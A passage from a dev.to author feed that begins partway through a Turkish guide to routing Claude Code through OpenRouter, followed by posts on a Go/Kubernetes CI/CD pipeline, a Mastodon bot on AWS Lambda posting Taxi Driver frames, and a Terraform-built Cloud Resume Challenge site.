Değişkenlerini Ayarlayın </h3> <p>Shell profil dosyanıza (<code>~/.zshrc</code> veya <code>~/.bashrc</code>) şu satırları ekleyin:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">export </span><span class="nv">ANTHROPIC_BASE_URL</span><span class="o">=</span><span class="s2">"https://openrouter.ai/api"</span> <span class="nb">export </span><span class="nv">ANTHROPIC_AUTH_TOKEN</span><span class="o">=</span><span class="s2">"sk-or-ANAHTARINIZ_BURAYA"</span> <span class="c">#OpenRouter API Key</span> <span class="nb">export </span><span class="nv">ANTHROPIC_API_KEY</span><span class="o">=</span><span class="s2">""</span> </code></pre> </div> <p><code>ANTHROPIC_API_KEY</code>'i <strong>boş bırakmak</strong> kasıtlı — bu Claude Code'un Anthropic'e değil, OpenRouter'a gitmesini sağlıyor.</p> <p>Ardından terminali yenileyin:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">source</span> ~/.zshrc </code></pre> </div> <h3> Adım 4 — Bir Model Seçin ve Başlatın </h3> <p>OpenRouter’daki <a href="https://openrouter.ai/models?q=free" rel="noopener noreferrer">ücretsiz</a> modelleri inceleyin. Beğendiğiniz bir modeli seçin:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>claude <span class="nt">--model</span> <span class="s2">"openrouter-model-name"</span> </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr66bes9ph7rq051zi2sq.PNG" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr66bes9ph7rq051zi2sq.PNG" width="800" height="232"></a></p> <p>Bu kadar. Claude Code artık OpenRouter üzerinden çalışıyor.</p> <h2> Çalıştığını Nereden Anlarım? </h2> <p>Claude Code içinde /status komutunu çalıştırın. Ayrıca OpenRouter’ın Activity Dashboard’unda isteklerinizi canlı görebilirsiniz.</p> <p>Oturum içinde model değiştirmek isterseniz:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>/model &lt;model-name-here&gt; </code></pre> </div> <h2> Dikkat Edilmesi Gereken Noktalar </h2> <p><strong>Ücretsiz modeller her zaman yeterli mi?</strong><br> Kod okuma, şablon oluşturma, hata açıklama, test yazma gibi görevlerde genelde tatmin edici sonuç alırsınız. Kritik üretim işleri veya derin refaktör için premium modeller hâlâ önerimdir.</p> <p><strong>Her Model Her Şeyi Yapamaz</strong><br> Claude Code’un dosya okuma/yazma, terminal komutları çalıştırma gibi özellikleri (tool calling) model desteği gerektirir. GPT-OSS, Qwen3, Gemini bu konuda güvenilir. Hafif modellerde bu özellik olmayabilir. Ayrıca gerçek zamanlı yanıt akışı (streaming) için de modelin desteği şart. OpenRouter’ın model sayfasından teyit edin, iyi alışkanlık.</p> <h2> Sonuç </h2> <p>Claude Code, sandığınızdan çok daha esnek bir araç. Hangi API’yle konuştuğunu bir URL ve bir anahtarla değiştirebiliyorsunuz. Geri kalan her şey aynı.</p> <p>Dört satır kod. Beş dakika. Artık herhangi bir modele erişiminiz var.</p> <p>Anthropic faturası ödemek istemiyorsanız veya farklı modelleri denemek istiyorsanız, işte başlangıç noktanız.</p> ai cli tooling tutorial DevOps Pipeline: Go Uygulamasından Kubernetes’e Sürekli Entegrasyon Taha Yağız Güler Sat, 23 Nov 2024 16:25:03 +0000 https://dev.to/tahayagizguler/2ntech-proje-1ka6 https://dev.to/tahayagizguler/2ntech-proje-1ka6 <p><strong>DevOps Pipeline: Go Uygulamasından Kubernetes’e Sürekli Entegrasyon</strong><br> <strong>Proje Amacı</strong><br> Bu projede, Go dilinde yazılmış bir web uygulamasının geliştirilmesi, Docker kullanarak konteynerleştirilmesi, GitHub Actions ile CI/CD sürecinin kurulması, Kubernetes kullanılarak uygulamanın dağıtımının otomatik hale getirilmesi ve Argo CD ile sürekli dağıtım sürecinin entegrasyonu üzerine odaklandım.</p> <p>Projenin GitHub reposuna <a href="https://github.com/tahayagizguler/devops-go-webapp/tree/main" rel="noopener noreferrer">buradan </a>ulaşabilirsiniz.</p> <p><strong>1. Go Web Uygulaması Oluşturulması</strong></p> <p>Aşağıda, basit bir Go web uygulamasının test edilmiş örneği yer almaktadır:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>package main import ( "net/http" "net/http/httptest" "testing" ) func TestHomePage(t *testing.T) { req, err := http.NewRequest("GET", "/", nil) if err != nil { t.Fatal(err) } rr := httptest.NewRecorder() handler := http.HandlerFunc(homePage) handler.ServeHTTP(rr, req) if status := rr.Code; status != http.StatusOK { t.Errorf("homePage handler returned wrong status code: got %v want %v", status, http.StatusOK) } } </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>func TestHomeEndpoint(t *testing.T) { req, err := http.NewRequest("GET", "/home", nil) if err != nil { t.Fatal(err) } rr := httptest.NewRecorder() handler := http.HandlerFunc(homePage) handler.ServeHTTP(rr, req) if status := rr.Code; status != http.StatusOK { t.Errorf("home handler returned wrong status code: got %v want %v", status, http.StatusOK) } } func TestAboutPage(t *testing.T) { req, err := http.NewRequest("GET", "/about", nil) if err != nil { t.Fatal(err) } rr := httptest.NewRecorder() handler := http.HandlerFunc(aboutPage) handler.ServeHTTP(rr, req) if status := rr.Code; status != http.StatusOK { t.Errorf("aboutPage handler returned wrong status code: got %v want %v", status, http.StatusOK) } } </code></pre> </div> <p><strong>2. Konteynerleştirme - Dockerfile Kullanımı</strong><br> Bu süreçte, çok aşamalı bir Dockerfile kullanarak uygulamanın boyutunu optimize ettim. Dockerfile aşağıdaki gibi hazırlanmıştır:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>FROM golang:1.23 AS base WORKDIR /app COPY go.mod . RUN go mod download COPY . . RUN go build -o main . # Final stage - Distroless image. FROM gcr.io/distroless/base COPY --from=base /app/main . COPY --from=base /app/static ./static # Expose the port on which the application will run EXPOSE 8080 # Command to run the application CMD ["./main"] </code></pre> </div> <p><strong>3. Kubernetes ile Dağıtım</strong><br> Uygulamanın Docker ile konteynerleştirilmesinin ardından, Kubernetes (K8s) kullanarak dağıtım yaptım. EKS (Amazon Elastic Kubernetes Service) kullanarak, Kubernetes kümesi oluşturdum ve Go uygulamasını bu kümeye dağıttım. AWS Kubernetes kümemi oluştururken eksctl kullandım ve Terraform ile yapmamın sebebi Bu kadar kısa bir işlem için buna gerek duymamam.<br> ”Eğer Terraform ile ilgili projelerimi incelemek isterseniz, <a href="https://github.com/tahayagizguler" rel="noopener noreferrer">GitHub</a> profilimi inceleyebilirsiniz.”</p> <p>Aşağıda uygulamanın Kubernetes dağıtımı için kullanılan YAML dosyaları örnek olarak verilmiştir:</p> <p>Deployment: Uygulamanın dağıtımını ve yönetimini sağlar.<br> Service: Uygulamanın dış dünyaya açılmasını sağlar.<br> Ingress: Trafiğin doğru yönlendirilmesini ve dış erişimi sağlar.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code># deployment.yaml apiVersion: apps/v1 kind: Deployment metadata: name: go-web-app labels: app: go-web-app spec: replicas: 1 selector: matchLabels: app: go-web-app template: metadata: labels: app: go-web-app spec: containers: - name: go-web-app image: tyguler/go-web-app:v1 ports: - containerPort: 8080 </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code># Ingress apiVersion: networking.k8s.io/v1 kind: Ingress metadata: name: go-web-app annotations: nginx.ingress.kubernetes.io/rewrite-target: / spec: ingressClassName: nginx rules: - host: go-web-app.local http: paths: - path: / pathType: Prefix backend: service: name: go-web-app port: number: 80 </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code># Service apiVersion: v1 kind: Service metadata: name: go-web-app labels: app: go-web-app spec: ports: - port: 80 targetPort: 8080 protocol: TCP selector: app: go-web-app type: ClusterIP </code></pre> </div> <p><strong>4. Helm ile Uygulama Yönetimi</strong><br> Kubernetes üzerinde uygulama yönetimini kolaylaştırmak için Helm kullanmaya karar verdim. Helm, Kubernetes için bir paket yöneticisidir ve uygulamanın dağıtımını, yapılandırmasını ve sürüm yönetimini basitleştirir.</p> <p>Helm chart'ları, Kubernetes kaynaklarını yönetmek için şablonlar sağlar ve bu şablonlar, her ortamda uygulanabilir hale gelir.</p> <p>İlk olarak bir chart oluşturdum:<br> <code>helm create go-web-app-chart</code><br> Sonrasında K8s YAML dosyalarını templates klasörüne kopyaladım ve imajları yönetebilmek için bir değişken atadım:<br> <code>image: tyguler/go-web-app:{{ .Values.image.tag }}</code></p> <p>Bu sayede chart içerisindeki Values.yaml dosyasından kontrol sağladım.<br> <code>helm install go-web-app ./go-web-app-chart</code> komutu ile tüm yapıyı test ettim ve sonrasında <code>helm uninstall go-web-app</code> komutu ile kaynakları temizledim.</p> <p><strong>5. GitHub Actions ile CI/CD Süreci</strong><br> Uygulamanın otomatik olarak test edilmesi, derlenmesi ve dağıtımı için GitHub Actions kullandım. GitHub Actions, her commit sonrası otomatik olarak testlerin çalıştırılmasını, Docker imajlarının oluşturulmasını ve bunların DockerHub'a yüklenmesini sağlar. Bu işlem, sürekli entegrasyon (CI) sürecinin temelini oluşturur.</p> <p>GitHub Actions iş akışı şu şekildedir:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>name: CI on: push: branches: - main paths-ignore: - 'README.md' - 'helm/**' jobs: build: runs-on: ubuntu-latest steps: - name: Checkout uses: actions/checkout@v4 - name: Set up Go 1.23 uses: actions/setup-go@v2 with: go-version: 1.23 - name: Build run: go build -o go-web-app - name: Test run: go test ./... # ./... means all subdirectories code_quality: runs-on: ubuntu-latest steps: - name: Checkout uses: actions/checkout@v4 - name: GolangCI-Lint uses: golangci/golangci-lint-action@v6 with: version: latest push: runs-on: ubuntu-latest steps: - name: Checkout uses: actions/checkout@v4 - name: Set up Docker Buildx uses: docker/setup-buildx-action@v1 - name: Login to DockerHub uses: docker/login-action@v2 with: username: ${{ secrets.DOCKER_USERNAME }} password: ${{ secrets.DOCKER_PASSWORD }} - name: Build and push uses: docker/build-push-action@v6 with: context: . file: ./Dockerfile push: true tags: ${{ secrets.DOCKER_USERNAME }}/go-web-app:${{ github.run_id }} update-newtag-in-helm-chart: runs-on: ubuntu-latest needs: push steps: - name: Checkout repository uses: actions/checkout@v4 - name: Update Helm chart run: | # Update the Helm chart tag sed -i 's/tag: .*/tag: ${GITHUB_RUN_ID}/' ./go-web-app-chart/values.yaml </code></pre> </div> <p><strong>6. Argo CD ile Sürekli Dağıtım Süreci</strong><br> Son olarak, Argo CD ile sürekli dağıtım sürecini tamamladım. Argo CD, Kubernetes kümelerine otomatik dağıtım yaparak uygulamaların doğru sürümlerinin her zaman çalışmasını sağlar. Argo CD'nin kullanımını otomatikleştirdim ve Helm chart'ım ile sürekli dağıtımı Argo CD üzerinden gerçekleştirdim.</p> <p>Argo CD'yi kurduktan sonra, Helm chart'ımı kaynak olarak ekledim ve Argo CD üzerinden manuel veya otomatik dağıtımlar gerçekleştirdim.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0pjrmikvmd4nthcfxdyo.PNG" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0pjrmikvmd4nthcfxdyo.PNG" alt=" " width="800" height="263"></a></p> <p><strong>Sonuç</strong><br> Proje, Docker, Kubernetes, Helm, GitHub Actions ve Argo CD entegrasyonuyla uygulama geliştirme ve dağıtım süreçlerini otomatikleştirmeme olanak tanıdı. Bu süreçlerin her birini doğru şekilde entegre etmek, sürekli entegrasyon (CI) ve sürekli dağıtım (CD) süreçlerini başarıyla kurmak, yazılım geliştirme ve dağıtımında verimliliği artırarak daha hızlı ve güvenilir sonuçlar elde edilmesini sağladı. Bu projede öğrendiğim en önemli şeylerden biri, farklı araç ve teknolojilerin birbirine nasıl entegre olacağını anlamak ve bu entegrasyonu etkin bir şekilde yönetebilmektir.</p> <p>Karşılaşılan Zorluklar<br> Her ne kadar proje başarılı bir şekilde tamamlanmış olsa da, bazı zorluklarla karşılaştım. Bu zorluklar, proje sürecinin bazı noktalarında benim için önemli öğrenme fırsatları sundu.</p> <ul> <li><p>GitHub Actions ile CI/CD sürecini kurarken, özellikle test aşamalarında karşılaştım. Docker imajlarının doğru bir şekilde yapılandırılması ve DockerHub'a yüklenmesi için gerekli olan adımlar zaman zaman hatalı gerçekleşti. Bu durumun üstesinden gelmek için GitHub Actions iş akışını dikkatlice optimize ettim ve her bir adımı doğru sırayla çalışacak şekilde yapılandırdım.</p></li> <li><p>Argo CD ile sürekli dağıtım süreçlerini otomatikleştirmeye çalışırken, Helm chart'ları ile doğru entegrasyonu sağlamak bazen karmaşık hale geldi. Bu durumu çözmek için Argo CD'nin Helm entegrasyonunu dikkatlice araştırdım ve doğru Helm chart sürümünü kullandım. Ayrıca, Argo CD'nin düzgün çalışması için kaynakların doğru şekilde tanımlanması gerektiği konusunda birçok deneme yaptım.</p></li> <li><p>Kubernetes kümesinin yönetimi, özellikle manuel yapılandırmalar ve değişikliklerin yapılması gerektiğinde zorlayıcı olabiliyor. EKS üzerinde kümeyi yönetmek, özellikle altyapı hataları veya ağ yapılandırma sorunları nedeniyle zaman zaman karmaşık hale geldi. Bu zorlukları aşmak için AWS belgelerine başvurdum ve en iyi uygulama örneklerini takip ettim.</p></li> </ul> Mastadon Bot with AWS Lambda, S3, CloudWatch, and SSM Taha Yağız Güler Thu, 23 Mar 2023 13:08:57 +0000 https://dev.to/tahayagizguler/mastadon-bot-with-aws-lambda-s3-cloudwatch-and-ssm-2bmf https://dev.to/tahayagizguler/mastadon-bot-with-aws-lambda-s3-cloudwatch-and-ssm-2bmf <p>In this post I show you how I set up the MastadonBot to share random frames from the movie Taxi Driver.<br> This bot was created by taking inspiration from <a href="https://www.cameronezell.com/creating-a-mastodon-bot-with-aws-lambda/" rel="noopener noreferrer">Cameron Ezell</a>.</p> <p>I also created this bot using Terraform. You can browse <a href="https://github.com/tahayagizguler/MastadonBot_AWS" rel="noopener noreferrer">Github MastadonBot_AWS</a>.</p> <h2> <strong>How I got the frames?</strong> </h2> <p>Python script "<a href="https://github.com/tahayagizguler/ExtractImagesFromVideoFile" rel="noopener noreferrer">ExtractImagesFromVideoFile</a>" I wrote for capturing screenshots at specified intervals from a video file using ffmpeg. This Python script captures screenshots from a video file at specified intervals (e.g., 1 second) using ffmpeg.</p> <h2> <strong>Uploading frames!</strong> </h2> <p>First of all, I created an S3 bucket and uploaded the screenshots I wanted to share to this bucket and used the following path while uploading the screenshots.</p> <p>After saving about 7000 screenshots it would take quite a while to upload them to the S3 bucket so I created an EC2 instance and uploaded the files via FTP then copied the S3 bucket via the aws cli &gt; <code>aws s3 cp ./ s3://your-bucket/ --recursive</code>.</p> <h2> <strong>Create your Application</strong> </h2> <p>For anyone interested in building a Mastodon bot, make sure the instance you create your bot on is fine with automated accounts.</p> <p>After signing up, create an app from Preferences &gt; Development.<br><br> (<a href="https://botsin.space/about" rel="noopener noreferrer">botsin.space</a>)</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb1vefcuicab5zsofxg1c.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb1vefcuicab5zsofxg1c.png" alt="App" width="800" height="447"></a><br> Enter a name for your application and default values for now.<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8zjdeqlnimla4aqswpa5.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8zjdeqlnimla4aqswpa5.jpg" alt="Keys" width="800" height="220"></a></p> <p><strong>I keep the access token as SecureString type using the AWS Systems Manager Parameter Store. This is an important step for security.</strong></p> <h2> <strong>Lambda Function</strong> </h2> <p>Boto3(AWS Lambda) script for randomly selects screenshots stored in S3 and enables sharing.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>import mastodon from mastodon import Mastodon import boto3 import os import random import re def lambda_handler(event, context): BASE_URL = "https://botsin.space" BUCKET_NAME = "movieframebucket" # XXXXXXX keyArray = [] ssm = boto3.client("ssm") auth_keys = ssm.get_parameters( Names=["my_consumer_key"], WithDecryption=True) # XXXXXXX access_token = auth_keys["Parameters"][0]["Value"] m = Mastodon(access_token=access_token, api_base_url=BASE_URL) s3 = boto3.resource("s3") s3bucket = s3.Bucket(BUCKET_NAME) try: for obj in s3bucket.objects.filter(Prefix="taxi_driver_frames/"): # XXXXXXX # add all frame key values from episode to an array keyArray.append("{0}".format(obj.key)) except Exception as e: # If there is an error, raise the exception and stop the function raise e numFrames = len(keyArray) randomFrame = random.randint(0, numFrames) KEY = keyArray[randomFrame] print("frame from second # " + str(randomFrame)) s3.Bucket(BUCKET_NAME).download_file(KEY, "/tmp/local.jpg") random_objectNumber = re.search(r'\d+', KEY).group() time_in_seconds = int(random_objectNumber) minutes, seconds = divmod(time_in_seconds, 60) hours, minutes = divmod(minutes, 60) time_format = "{:02d}:{:02d}:{:02d}".format(hours, minutes, seconds) frameInfo = "Taxi Driver | {:02d}:{:02d}:{:02d}".format(hours, minutes, seconds) # We have to first create a media ID when uploading an image media = m.media_post("/tmp/local.jpg") # Then we can reference this media ID in our status post m.status_post(status=frameInfo, media_ids=media) os.remove("/tmp/local.jpg") return None </code></pre> </div> <p>I installed the Mastadon package locally and zipped it with this code I wrote then uploaded it to Lambda.</p> <h2> <strong>CloudWatch Event for Lambda</strong> </h2> <p>I created a CloudWatch Event for Lambda to publish a post every 30 minutes.<br> <a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxs5utxgrcw7xzfbv3mre.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxs5utxgrcw7xzfbv3mre.png" alt="Im" width="799" height="272"></a><strong>And here is our <a href="https://botsin.space/@taxidriverframes" rel="noopener noreferrer">Mastadon bot</a> ready!</strong></p> <p><strong>I may have missed a few parts, don't hesitate to reach out to me if you need help. I would like to help you as much as I can!</strong></p> python devops cloud productivity Cloud Resume Challenge (AWS) Taha Yağız Güler Sun, 19 Feb 2023 15:17:33 +0000 https://dev.to/tahayagizguler/cloud-resume-challenge-aws-4ghf https://dev.to/tahayagizguler/cloud-resume-challenge-aws-4ghf <p>Cloud Resume Challenge is a project that helps us learn to use the cloud and some essential tools. You can access the outline of the project here <a href="https://cloudresumechallenge.dev/" rel="noopener noreferrer">Cloud Resume Challenge</a>.</p> <p>In this blog post, I will tell you about the steps I completed and challenges I went through the Cloud Resume Challenge. This challenge made me more familiar with using AWS services with Terraform. I learned about how the services work. I also learned and experienced a lot of things that I can't think of right now.</p> <p>You can see the final result <a href="//tahayagizguler.tech">here</a> and see the <a href="https://github.com/tahayagizguler/cloudresumeAWS" rel="noopener noreferrer">GitHub code</a>.</p> <p><strong>You can complete this challenge as part of the AWS Free tier.</strong><br> You only need to buy a domain name, but if you are a student there are many ways to buy it for free. In the next part of the article, I will talk about how to get a free domain name.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2d4uxrz59qw6s7qqt4ah.jpg" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2d4uxrz59qw6s7qqt4ah.jpg" alt="Projecy Diagram" width="800" height="513"></a></p> <p><strong>Now, let's take a look at which stages we need to complete.</strong></p> <h2> Challenge Steps </h2> <ul> <li><strong>Build a website in HTML/CSS.</strong></li> </ul> <p>This step is very easy. Simply create a resume page for your resume website using html and css.</p> <ul> <li><strong>Host website with S3 Bucket.</strong></li> </ul> <p>I'm build with Terraform, but you can use AWS SAM if you want.</p> <p>I created an S3 bucket and determined the necessary CORS rule, and at the end, I ensured that the objects were uploaded to the S3 bucket collectively.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>resource "aws_s3_bucket" "cloud-resume-bucket" { bucket = var.bucket_name acl = "public-read" policy = file("website/policy.json") website { index_document = "index.html" error_document = "error.html" } } resource "aws_s3_bucket_cors_configuration" "s3_bucket_cors" { bucket = aws_s3_bucket.cloud-resume-bucket.id cors_rule { allowed_headers = ["*"] allowed_methods = ["GET", "POST"] allowed_origins = ["*"] max_age_seconds = 10 } } resource "aws_s3_object" "test" { for_each = fileset("${path.module}/html", "**/*.*") acl = "public-read" bucket = var.bucket_name key = each.value source = "${path.module}/html/${each.value}" content_type = lookup(var.mime_types, split(".", each.value)[length(split(".", each.value)) - 1]) } </code></pre> </div> <ul> <li><strong>CloudFront for routing HTTP/S traffic.</strong></li> </ul> <p>S3 website URL should use HTTPS for security. I did this with Cloudfront.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>resource "aws_cloudfront_distribution" "s3_cf" { origin { domain_name = "${aws_s3_bucket.cloud-resume-bucket.bucket_regional_domain_name}" origin_id = "${local.s3_origin_id}" } enabled = true is_ipv6_enabled = true default_root_object = "index.html" custom_error_response { error_caching_min_ttl = 0 error_code = 404 response_code = 200 response_page_path = "/error.html" } aliases = [var.domain_name] default_cache_behavior { allowed_methods = ["GET", "HEAD"] cached_methods = ["GET", "HEAD"] target_origin_id = "${local.s3_origin_id}" forwarded_values { query_string = false cookies { forward = "none" } } viewer_protocol_policy = "redirect-to-https" #redirect-to-https min_ttl = 0 default_ttl = 3600 max_ttl = 86400 } restrictions { geo_restriction { restriction_type = "none" } } # viewer_certificate { # cloudfront_default_certificate = true # } viewer_certificate { acm_certificate_arn = aws_acm_certificate_validation.acm_val.certificate_arn ssl_support_method = "sni-only" minimum_protocol_version = "TLSv1.2_2021" } } </code></pre> </div> <ul> <li><strong>Route53 for custom DNS.</strong></li> </ul> <p>In this step, I registered my domain name to the Route53 service as seen below.<br> (With the Github student package, you can get a free domain name.)<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>resource "aws_route53_zone" "main" { name = var.domain_name } resource "aws_route53_record" "domain" { zone_id = "${aws_route53_zone.main.zone_id}" name = "${var.domain_name}" type = "A" alias { name = "${aws_cloudfront_distribution.s3_cf.domain_name}" zone_id = "${aws_cloudfront_distribution.s3_cf.hosted_zone_id}" evaluate_target_health = false } } resource "aws_route53_record" "cert_validation" { for_each = { for dvo in aws_acm_certificate.cert.domain_validation_options : dvo.domain_name =&gt; { name = dvo.resource_record_name record = dvo.resource_record_value type = dvo.resource_record_type } } allow_overwrite = true name = each.value.name records = [each.value.record] ttl = 60 type = each.value.type zone_id = aws_route53_zone.main.zone_id } </code></pre> </div> <ul> <li><strong>Certificate Manager for enabling secure access with SSL Certificate.</strong></li> </ul> <p>I set SSL certificate with the ACM service.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>resource "aws_acm_certificate" "cert" { domain_name = var.domain_name validation_method = "DNS" lifecycle { create_before_destroy = true } } resource "aws_acm_certificate_validation" "acm_val" { certificate_arn = aws_acm_certificate.cert.arn validation_record_fqdns = [for record in aws_route53_record.cert_validation : record.fqdn] } </code></pre> </div> <ul> <li><strong>DynamoDB for database, storing website visitor count.</strong></li> </ul> <p>I created a DynamoDB database to retrieve and update the visitor counter.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>resource "aws_dynamodb_table" "visiters" { name = var.dynamodb_table billing_mode = "PROVISIONED" read_capacity = 1 write_capacity = 1 hash_key = "id" attribute { name = "id" type = "N" } } </code></pre> </div> <ul> <li><strong>Lambda function (python) to read/write website visitor count to DynamoDB.</strong></li> </ul> <p>After setting it up to work with database. I added the Lambda function I wrote with Python(boto3) and the necessary IAM policy.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>data "archive_file" "lambda_zip" { type = "zip" source_dir = "${path.module}/src" output_path = "${path.module}/src.zip" } resource "aws_s3_object" "this" { bucket = aws_s3_bucket.cloud-resume-bucket.id key = "src.zip" source = data.archive_file.lambda_zip.output_path etag = filemd5(data.archive_file.lambda_zip.output_path) } //Define lambda function resource "aws_lambda_function" "apigw_lambda_ddb" { function_name = "app" description = "visiter counter" s3_bucket = aws_s3_bucket.cloud-resume-bucket.id s3_key = aws_s3_object.this.key runtime = "python3.8" handler = "app.lambda_handler" source_code_hash = data.archive_file.lambda_zip.output_base64sha256 role = aws_iam_role.lambda_exec.arn environment { variables = { DDB_TABLE = var.dynamodb_table } } } resource "aws_iam_role" "lambda_exec" { name_prefix = "LambdaDdbPost" assume_role_policy = jsonencode({ Version = "2012-10-17" Statement = [{ Action = "sts:AssumeRole" Effect = "Allow" Sid = "" Principal = { Service = "lambda.amazonaws.com" } } ] }) } resource "aws_iam_policy" "lambda_exec_role" { name_prefix = "lambda-tf-pattern-ddb-post" policy = &lt;&lt;POLICY { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": [ "dynamodb:GetItem", "dynamodb:UpdateItem" ], "Resource": "arn:aws:dynamodb:*:*:table/${var.dynamodb_table}" } ] } POLICY } resource "aws_iam_role_policy_attachment" "lambda_policy" { role = aws_iam_role.lambda_exec.name policy_arn = aws_iam_policy.lambda_exec_role.arn } </code></pre> </div> <ul> <li><strong>API Gateway to trigger Lambda function.</strong></li> </ul> <p>I set up API Gateway to trigger Lambda Func.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code># resource "random_string" "random" { # length = 4 # special = false # } resource "aws_apigatewayv2_api" "http_lambda" { # name = "${var.apigw_name}-${random_string.random.id}" name = "${var.apigw_name}" protocol_type = "HTTP" } resource "aws_apigatewayv2_stage" "default" { api_id = aws_apigatewayv2_api.http_lambda.id name = "$default" auto_deploy = true } resource "aws_apigatewayv2_integration" "apigw_lambda" { api_id = aws_apigatewayv2_api.http_lambda.id integration_uri = aws_lambda_function.apigw_lambda_ddb.invoke_arn integration_type = "AWS_PROXY" integration_method = "POST" } resource "aws_apigatewayv2_route" "get" { api_id = aws_apigatewayv2_api.http_lambda.id route_key = "GET /" target = "integrations/${aws_apigatewayv2_integration.apigw_lambda.id}" } # Gives an external source permission to access the Lambda function. resource "aws_lambda_permission" "api_gw" { statement_id = "AllowExecutionFromAPIGateway" action = "lambda:InvokeFunction" function_name = aws_lambda_function.apigw_lambda_ddb.function_name principal = "apigateway.amazonaws.com" source_arn = "${aws_apigatewayv2_api.http_lambda.execution_arn}/*/*" } </code></pre> </div> <p><strong>Then, after setting up the CI/CD process with Github actions, I launched the website. This blog post is just a summary of my work. I faced many difficulties while completing this. The hardest step for me was connecting the Lambda - APIGW - DynamoDB services, but after some thought and research I was able to get around this. Thank you for reading, if you want to reach the codes of the project in detail, you can visit my GitHub account.</strong></p> <p><a href="//tahayagizguler.tech">My Resume Site</a><br> <a href="https://github.com/tahayagizguler/cloudresumeAWS" rel="noopener noreferrer">GitHub Link of The Project</a></p> tutorial devops python